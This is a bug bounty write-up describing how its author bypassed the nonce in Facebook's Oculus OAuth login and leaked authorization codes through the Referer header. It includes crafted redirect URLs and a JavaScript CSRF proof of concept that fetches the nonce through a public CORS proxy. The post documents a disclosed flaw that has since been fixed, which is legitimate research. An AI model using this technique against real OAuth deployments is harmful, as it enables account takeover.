Bypass OAuth nonce and steal oculus response code

This post is about an bug that i found on Facebook Oculus Application OAuth which could have been used to bypass nonce and steal response_code

Recently Facebook made a Oauth login Feature for Oculus. that means the user can directly login to oculus using facebook account.but there is a nonce parameter in the URL. that i never seen in any other Oauth flow. so i started to dig deeper on it.

OAuth Authorisation URL for Facebook Oculus :

Request :

https://www.facebook.com/v2.8/dialog/oauth?app_id=1517832211847102&client_id=1517832211847102&domain=auth.oculus.com&locale=en_GB&origin=1&redirect_uri=https://auth.oculus.com/login/&response_type=code&sdk=joey&version=v2.8&nonce=AXRr8eBAjDTBkzQ7&state=d916afa3-3dc1-bab7-fc9d-3c8f44bf757

Response :

https://auth.oculus.com/login/?code=AQDtxcP7I--AWqEvE-LjcPIjkimy7Z-oQHvLMtGNB8sdKSqhvvv5KFO1KNXgPw4nEewmFsOKsq1GIAcEqJq09rLHlsGQVBxq-HwqbvlE-_unfTayj2HdGp5GGEqsNLlK2zerCpKbBHbiDRW4tr7ZBnxcgebywDbd,lonbrqie5fdwjD-x6jsnI5wnZ4XaDIRMixFoRqtQSne406BwOo2nSVS2o1MmmXkLW_zaW5Vy0SW6&state=d916afa3-3dc1-bab8-fc9d-3c8f44bfe7b7#_=_

The nonce act as CSRF token to prevent the user from CSRF attack.if the nonce value is not matched the Oauth request will get aborted . and does not follow the redirect_url.

In this Oauth flow i had two challenges :

1. Bypass nonce

2. Bypass redirect_url

Bypassing nonce is not that much easy. but i decided to make a try . after some testing i came to know nothing (Zero Progress).

when i Googled came to know about CORS Proxy. it is a free service for developers who need to bypass same-origin policy related to performing standard AJAX requests to 3rd party services.

There are some online Proxy servers:

  1. https://robwu.nl/cors-anywhere.html
  2. https://crossorigin.me/
  3. http://cors.now.sh/ etc….

when i passed the Oauth url in this proxy server it respond the source code of the given URL. when i searched for nonce in the source code can’t believe that both of the nonce value in real request and using this cors request are same.

So i bypassed the nonce now its time to bypass redirect url. then i started to explore but it made easy than i think.the below URL redirect the Response_code to my app domain using Referer leakage .

https://auth.oculus.com/login/?redirect_uri=https://www.facebook.com/dialog/send?client_id=1933886253534366&next=https://www.whatismyreferer.com&from_post=1&error_ok=OK

Now i Bypassed the both nonce and redirect_url . but to reproduce this all process with one click a CSRF POC to be created.

The Below code first make a cors request and get the nonce value in source code.finally combines the final_url + nonce in window.location and make a request.

var Cors_URL = "https://crossorigin.me/https://www.facebook.com/v2.8/dialog/oauth?app_id=1517832211847102&redirect_uri=https://auth.oculus.com/login/&response_type=code";
var Final_url = "https://www.facebook.com/v2.8/dialog/oauth?app_id=1517832211847102&response_type=code&redirect_uri=https://auth.oculus.com/login/?redirect_uri=https://www.facebook.com/dialog/send?client_id=1933886253534366%2526next%253Dhttps://www.whatismyreferer.com%2526from_post%253D1%2526error_ok%253DOK&nonce=";
var xhttp = new XMLHttpRequest();
xhttp.open("GET", Cors_URL , true);
xhttp.send();
xhttp.onload = function() {
var str = xhttp.response.split("nonce=")[1];
var nonce = str.split("&")[0];
if (nonce.length == 0){
alert("Sorry! nonce not found..");
}
else {
alert("nonce : " + nonce);
Final_url = Final_url + nonce ;
window.location = Final_url ;

}

};
xhttp.onerror = function() {
alert("Please try again.");

};

Video POC:

To reproduce this bug the victim should be logged in both Facebook and oculus .because redirect_uri works only when the user is logged into his oculus account.

The Fix:

The leakage of nonce value in CORS Proxy and the redirect_uri in oculus to Facebook was fixed.

Timeline:

30-June-2017 : Report Sent

6-July-2017 : Facebook response that not able to reproduce the issue

6-July-2017 : Additional details provided by me

1-August-2017 : Further investigation by Facebook

10-August-2017: Fixed by Facebook

14-August-2017 : $10,000 bounty awarded by Facebook

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.